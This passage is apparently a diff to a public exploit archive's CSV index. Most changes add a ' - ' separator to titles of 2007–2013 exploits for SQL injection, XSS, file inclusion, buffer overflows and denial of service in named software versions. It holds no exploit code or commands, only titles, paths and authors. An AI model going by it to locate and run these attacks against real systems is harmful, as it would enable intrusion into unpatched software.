Bypass",2007-05-25,"242th section",php,webapps,0 +30088,platforms/php/webapps/30088.txt,"Pligg 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,linux,dos,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - News.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 @@ -27150,17 +27145,17 @@ id,file,description,date,author,platform,type,port 30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 30216,platforms/cfm/webapps/30216.txt,"FuseTalk 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 30217,platforms/php/webapps/30217.txt,"Wrapper.php for OsCommerce - Local File Inclusion",2007-06-20,"Joe Bloomquist",php,webapps,0 -30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure",2007-06-20,Prili,multiple,remote,0 +30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 - Parse Error Information Disclosure",2007-06-20,Prili,multiple,remote,0 30219,platforms/multiple/remote/30219.txt,"MyServer 0.8.9 - Filename Parse Error Information Disclosure",2007-06-21,"Shay Priel",multiple,remote,0 30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 - Index.php Local File Inclusion",2007-06-21,r0t,php,webapps,0 30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 - Index.php Multiple SQL Injection",2007-06-21,r0t,php,webapps,0 -30222,platforms/multiple/remote/30222.txt,"MyServer 0.9.8 Post.MSCGI Cross-Site Scripting",2007-01-02,Prili,multiple,remote,0 +30222,platforms/multiple/remote/30222.txt,"MyServer 0.9.8 - Post.MSCGI Cross-Site Scripting",2007-01-02,Prili,multiple,remote,0 30223,platforms/php/webapps/30223.txt,"NetClassifieds 1.9.7 - Multiple Input Validation Vulnerabilities",2007-06-21,"laurent gaffie",php,webapps,0 30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos,0 30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 - mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 - banners.php click Action bid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 30227,platforms/php/webapps/30227.txt,"Joomla/Mambo Mod_Forum Component - PHPBB_Root.php Remote File Inclusion",2007-06-22,spymeta,php,webapps,0 -30228,platforms/osx/remote/30228.txt,"Apple WebCore XMLHTTPRequest Cross-Site Scripting",2007-06-22,"Richard Moore",osx,remote,0 +30228,platforms/osx/remote/30228.txt,"Apple WebCore - XMLHTTPRequest Cross-Site Scripting",2007-06-22,"Richard Moore",osx,remote,0 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 - Filename Parse Error Information Disclosure",2007-06-25,"Shay Priel",multiple,remote,0 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps,0 30231,platforms/multiple/remote/30231.txt,"Key Focus Web Server 3.1 - Index.WKF Cross-Site Scripting",2007-06-25,"Shay Priel",multiple,remote,0 @@ -27178,7 +27173,7 @@ id,file,description,date,author,platform,type,port 30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 - Plugin.php Authentication Bypass",2007-06-27,"Nico Leidecker",php,webapps,0 30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x - ICity Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 30251,platforms/linux/dos/30251.c,"GD Graphics Library 2.0.34 - (libgd) gdImageCreateXbm Function Unspecified DoS",2007-06-26,anonymous,linux,dos,0 -30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 Large String Denial of Service",2007-06-27,35c666,windows,dos,0 +30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 - Large String Denial of Service",2007-06-27,35c666,windows,dos,0 30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 - Open.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0 30254,platforms/hardware/remote/30254.txt,"Linksys Wireless-G ADSL Gateway WAG54GS 1.0.6 - Setup.CGI Cross-Site Scripting Vulnerabilities",2007-06-27,"Petko Petkov",hardware,remote,0 30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos,0 @@ -27189,8 +27184,8 @@ id,file,description,date,author,platform,type,port 30260,platforms/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",cgi,webapps,0 30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 - Index.php Cross-Site Scripting",2007-07-02,MustLive,php,webapps,0 30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS - Information Disclosure",2007-07-02,durito,php,webapps,0 -30263,platforms/cgi/webapps/30263.txt,"Oliver Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 -30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView 4.50.8 DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 +30263,platforms/cgi/webapps/30263.txt,"Oliver - Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 +30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView 4.50.8 - DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 30265,platforms/multiple/remote/30265.txt,"SAP Message Server - Group Parameter Remote Buffer Overflow",2007-07-05,"Mark Litchfield",multiple,remote,0 30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - /jspui/applicationList.jsp alpha Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - /jspui/appConfig.jsp task Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 @@ -27213,7 +27208,7 @@ id,file,description,date,author,platform,type,port 30287,platforms/windows/remote/30287.txt,"TippingPoint IPS Unicode Character Detection Bypass",2007-07-10,Security-Assessment.com,windows,remote,0 30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - SWF File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote,0 30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS - Default.ASP ID Parameter SQL Injection",2007-07-11,durito,asp,webapps,0 -30290,platforms/php/webapps/30290.txt,"IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",php,webapps,0 +30290,platforms/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",php,webapps,0 30291,platforms/linux/remote/30291.txt,"Multiple Vendors - RAR Handling Remote Null Pointer Dereference",2007-07-11,"Metaeye Security Group",linux,remote,0 30292,platforms/multiple/remote/30292.pl,"Apple QuickTime 7.1.5 - Information Disclosure / Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,multiple,remote,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 @@ -27249,7 +27244,7 @@ id,file,description,date,author,platform,type,port 30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - Philboard_forum.ASP SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - index.php current_subsection Parameter SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Blog Anonymous Blog Entry XSS",2007-07-17,joseph.giron13,php,webapps,0 -30319,platforms/linux/remote/30319.c,"tcpdump Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote,0 +30319,platforms/linux/remote/30319.c,"tcpdump - Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote,0 30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - deletecomment.php id Variable Remote Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - deleteblog.php id Variable Remote Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 30322,platforms/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 @@ -27275,7 +27270,7 @@ id,file,description,date,author,platform,type,port 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0 30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Path Traversal",2013-12-24,Metasploit,linux,remote,443 30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0 -30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box",2013-12-16,"Matt O'Connor",hardware,webapps,0 +30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - Exploit",2013-12-16,"Matt O'Connor",hardware,webapps,0 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - Search.Cache.Inc.php Backdoor",2007-11-21,D4m14n,php,webapps,0 30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Stored XSS",2013-12-16,"null pointer",php,webapps,0 30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -27284,7 +27279,7 @@ id,file,description,date,author,platform,type,port 30361,platforms/hardware/webapps/30361.txt,"Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities",2013-12-16,"Samandeep Singh",hardware,webapps,0 30362,platforms/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",hardware,webapps,0 30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 -30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0 +30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable - Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0 30364,platforms/php/webapps/30364.txt,"Lowest Unique Bid Auction - SQL Injection",2013-12-16,3spi0n,php,webapps,0 30365,platforms/php/webapps/30365.txt,"Penny Auction 5 - SQL Injection",2013-12-16,3spi0n,php,webapps,0 30800,platforms/asp/webapps/30800.html,"FooSun - Api_Response.ASP SQL Injection",2007-11-23,flyh4t,asp,webapps,0 @@ -27292,8 +27287,8 @@ id,file,description,date,author,platform,type,port 30396,platforms/php/webapps/30396.txt,"Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities",2013-12-17,"Martin Wundram",php,webapps,80 30397,platforms/windows/dos/30397.txt,"Windows Kernel Win32k.sys - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 30398,platforms/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",php,webapps,80 -30399,platforms/aix/local/30399.c,"IBM AIX 5.2/5.3 Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,aix,local,0 -30400,platforms/aix/local/30400.c,"IBM AIX 5.2/5.3 FTP Client Local Buffer Overflow",2007-07-26,qaaz,aix,local,0 +30399,platforms/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,aix,local,0 +30400,platforms/aix/local/30400.c,"IBM AIX 5.2/5.3 FTP Client - Local Buffer Overflow",2007-07-26,qaaz,aix,local,0 30401,platforms/php/dos/30401.php,"T1lib intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos,0 30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x - Login.ASP Cross-Site Scripting",2007-07-26,d3hydr8,asp,webapps,0 30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 Plugin - HTML Injection",2007-07-26,"David Kierznowski",php,webapps,0 @@ -27320,7 +27315,7 @@ id,file,description,date,author,platform,type,port 30426,platforms/asp/webapps/30426.txt,"Message Board / Threaded Discussion Forum - Sign_In.ASPX SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - Login.ASP SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 -30429,platforms/php/webapps/30429.txt,"phpCoupon Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 +30429,platforms/php/webapps/30429.txt,"phpCoupon - Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 30430,platforms/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",linux,dos,0 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - BaiduBar.DLL ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 30432,platforms/novell/remote/30432.txt,"Novell GroupWise 6.5 WebAccess - User.Id Parameter Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 @@ -27335,10 +27330,10 @@ id,file,description,date,author,platform,type,port 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote,0 30442,platforms/php/webapps/30442.txt,"WebDirector - Index.php Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 30443,platforms/php/webapps/30443.txt,"WordPress Persuasion Theme 2.x - Arbitrary File Download and File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 -30444,platforms/linux/dos/30444.txt,"KDE Konqueror 3.5.7 Assert Denial of Service",2007-03-05,"Thomas Waldegger",linux,dos,0 +30444,platforms/linux/dos/30444.txt,"KDE Konqueror 3.5.7 - Assert Denial of Service",2007-03-05,"Thomas Waldegger",linux,dos,0 30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module - mosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - Duyuruoku.ASP SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 -30447,platforms/windows/remote/30447.html,"Tor 0.1.2.15 ControlPort Missing Authentication Unauthorized Access",2007-08-02,anonymous,windows,remote,0 +30447,platforms/windows/remote/30447.html,"Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access",2007-08-02,anonymous,windows,remote,0 30448,platforms/php/webapps/30448.txt,"LANAI CMS 1.2.14 - FAQ Module mid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30449,platforms/php/webapps/30449.txt,"LANAI CMS 1.2.14 - EZSHOPINGCART Module cid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30450,platforms/php/webapps/30450.txt,"LANAI CMS 1.2.14 GALLERY Module - gid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 @@ -27375,7 +27370,7 @@ id,file,description,date,author,platform,type,port 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30483,platforms/php/webapps/30483.txt,"Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30484,platforms/bsd/local/30484.c,"Systrace Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 +30484,platforms/bsd/local/30484.c,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 30485,platforms/hardware/remote/30485.html,"ZyXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter XSS",2007-08-10,"Henri Lindberg",hardware,remote,0 30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 30487,platforms/php/webapps/30487.txt,"Php-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 @@ -27417,9 +27412,9 @@ id,file,description,date,author,platform,type,port 30523,platforms/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow",2007-08-23,"Luigi Auriemma",multiple,remote,0 30524,platforms/multiple/dos/30524.txt,"Soldat 1.4.2 - Multiple Remote Denial of Service Vulnerabilities",2007-08-23,"Luigi Auriemma",multiple,dos,0 30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 - Index.php Remote File Inclusion",2007-08-24,sm0k3,php,webapps,0 -30526,platforms/multiple/dos/30526.txt,"Vavoom 1.24 sv_main.cpp Say Command Remote Format String",2007-08-24,"Luigi Auriemma",multiple,dos,0 -30527,platforms/multiple/dos/30527.txt,"Vavoom 1.24 str.cpp VStr::Resize Function Crafted UDP Packet Remote DoS",2007-08-24,"Luigi Auriemma",multiple,dos,0 -30528,platforms/multiple/dos/30528.txt,"Vavoom 1.24 p_thinker.cpp VThinker::BroadcastPrintf Function Multiple Field Remote Overflow",2007-08-24,"Luigi Auriemma",multiple,dos,0 +30526,platforms/multiple/dos/30526.txt,"Vavoom 1.24 - sv_main.cpp Say Command Remote Format String",2007-08-24,"Luigi Auriemma",multiple,dos,0 +30527,platforms/multiple/dos/30527.txt,"Vavoom 1.24 - str.cpp VStr::Resize Function Crafted UDP Packet Remote DoS",2007-08-24,"Luigi Auriemma",multiple,dos,0 +30528,platforms/multiple/dos/30528.txt,"Vavoom 1.24 - p_thinker.cpp VThinker::BroadcastPrintf Function Multiple Field Remote Overflow",2007-08-24,"Luigi Auriemma",multiple,dos,0 30529,platforms/multiple/dos/30529.txt,"Media Player Classic 6.4.9 - FLI File Remote Buffer Overflow",2007-08-24,wushi,multiple,dos,0 30530,platforms/hardware/dos/30530.pl,"Thomson SpeedTouch 2030 - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",hardware,dos,0 30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - Index.php Cross-Site Scripting",2007-08-27,d3hydr8,php,webapps,0 @@ -27433,7 +27428,7 @@ id,file,description,date,author,platform,type,port 30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - index.php Multiple SQL Injection",2007-08-28,SmOk3,php,webapps,0 30540,platforms/multiple/dos/30540.txt,"Blizzard Entertainment StarCraft Brood War 1.15.1 - Minimap Preview Remote Denial of Service",2007-08-28,"Gynvael Coldwind",multiple,dos,0 30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 -30542,platforms/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 Uninitialized Pointer",2007-08-29,"Joxean Koret",linux,dos,0 +30542,platforms/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 - Uninitialized Pointer",2007-08-29,"Joxean Koret",linux,dos,0 30543,platforms/linux/remote/30543.txt,"Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities",2007-08-29,"Luigi Auriemma",linux,remote,0 30544,platforms/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service",2007-08-29,SlicK,windows,dos,0 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0 @@ -27443,9 +27438,9 @@ id,file,description,date,author,platform,type,port 30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0 -31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 +31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 30872,platforms/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps,0 -30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 +30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - .SWF Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 - Admin.php Authentication Bypass",2007-09-03,Demential,php,webapps,0 @@ -27479,7 +27474,7 @@ id,file,description,date,author,platform,type,port 30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - forum_forum.php id Parameter XSS",2007-09-12,Doz,php,webapps,0 30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 - text_search_action.php search_string Parameter XSS",2007-09-12,Doz,php,webapps,0 30577,platforms/php/webapps/30577.txt,"SWSoft Plesk 8.2 - login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 -30578,platforms/linux/dos/30578.txt,"MPlayer 1.0 AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",linux,dos,0 +30578,platforms/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",linux,dos,0 30579,platforms/linux/dos/30579.txt,"Media Player Classic 6.4.9 - Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",php,webapps,0 32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0 @@ -27506,7 +27501,7 @@ id,file,description,date,author,platform,type,port 32398,platforms/php/webapps/32398.txt,"eXtrovert software Thyme 1.3 - 'add_calendars.php' Cross-Site Scripting",2008-09-21,"DigiTrust Group",php,webapps,0 32397,platforms/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 - Multiple SQL Injection",2008-09-19,"Jan Van Niekerk",php,webapps,0 32396,platforms/php/webapps/32396.txt,"Parallels H-Sphere 3.0/3.1 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-19,t0fx,php,webapps,0 -32395,platforms/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 Database Disclosure",2008-09-19,r45c4l,php,webapps,0 +32395,platforms/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 - Database Disclosure",2008-09-19,r45c4l,php,webapps,0 32394,platforms/asp/webapps/32394.txt,"Sama Educational Management System - 'Error.asp' Cross-Site Scripting",2008-09-18,Lagon666,asp,webapps,0 32393,platforms/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution",2008-09-17,"Eli the Bearded",solaris,remote,0 32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,php,webapps,0 @@ -27530,8 +27525,8 @@ id,file,description,date,author,platform,type,port 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30590,platforms/windows/dos/30590.txt,"WinImage 8.0/8.10 - Malformed .IMG File BPB_BytsPerSec Field DoS",2007-09-17,j00ru//vx,windows,dos,0 30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 -30592,platforms/multiple/dos/30592.py,"Python 2.2 ImageOP Module Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",multiple,dos,0 -30593,platforms/windows/dos/30593.txt,"Microsoft MFC Library CFileFind::FindFile Buffer Overflow",2007-09-14,"Jonathan Sarba",windows,dos,0 +30592,platforms/multiple/dos/30592.py,"Python 2.2 ImageOP Module - Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",multiple,dos,0 +30593,platforms/windows/dos/30593.txt,"Microsoft MFC Library - CFileFind::FindFile Buffer Overflow",2007-09-14,"Jonathan Sarba",windows,dos,0 30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.x - mode.php referer Parameter XSS",2007-09-17,L4teral,php,webapps,0 30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.x - viewlog.php log Parameter Local File Inclusion",2007-09-17,L4teral,php,webapps,0 30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - hilfe.php Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0 @@ -27558,17 +27553,17 @@ id,file,description,date,author,platform,type,port 30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - admin/layout2b.php l_username Parameter XSS",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - comment.php backurl Parameter XSS",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30619,platforms/windows/dos/30619.txt,"Microsoft Windows Explorer - .PNG Image Local Denial Of Service",2007-07-26,"Xavier Roche",windows,dos,0 -30620,platforms/linux/local/30620.txt,"Xen 3.0.3 pygrub TOOLS/PYGRUB/SRC/GRUBCONF.PY Local Command Injection",2007-09-22,"Joris van Rantwijk",linux,local,0 +30620,platforms/linux/local/30620.txt,"Xen 3.0.3 - pygrub TOOLS/PYGRUB/SRC/GRUBCONF.PY Local Command Injection",2007-09-22,"Joris van Rantwijk",linux,local,0 30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - Buscar.ASP Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0 30622,platforms/windows/remote/30622.html,"Microsoft Internet Explorer 5.0.1 - File Upload",2007-09-27,"Ronald van den Heetkamp",windows,remote,0 30623,platforms/php/webapps/30623.pl,"MD-Pro 1.0.76 - Index.php Firefox ID SQL Injection",2007-09-29,"unidentified1_ is",php,webapps,0 -30624,platforms/asp/webapps/30624.txt,"Netkamp Emlak Scripti Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps,0 +30624,platforms/asp/webapps/30624.txt,"Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps,0 30625,platforms/asp/webapps/30625.txt,"Ohesa Emlak Portal 1.0 - satilik.asp Kategori Parameter SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 30626,platforms/asp/webapps/30626.txt,"Ohesa Emlak Portal 1.0 - detay.asp Emlak Parameter SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 -30627,platforms/windows/remote/30627.pl,"FSD 2.052/3.000 sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,remote,0 -30628,platforms/windows/dos/30628.txt,"FSD 2.052/3.000 servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,dos,0 +30627,platforms/windows/remote/30627.pl,"FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,remote,0 +30628,platforms/windows/dos/30628.txt,"FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,dos,0 30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - Default.ASP SQL Injection",2007-10-01,joseph.giron13,asp,webapps,0 -30630,platforms/multiple/remote/30630.c,"id Software Doom 3 Engine Console String Visualization Format String",2007-10-02,"Luigi 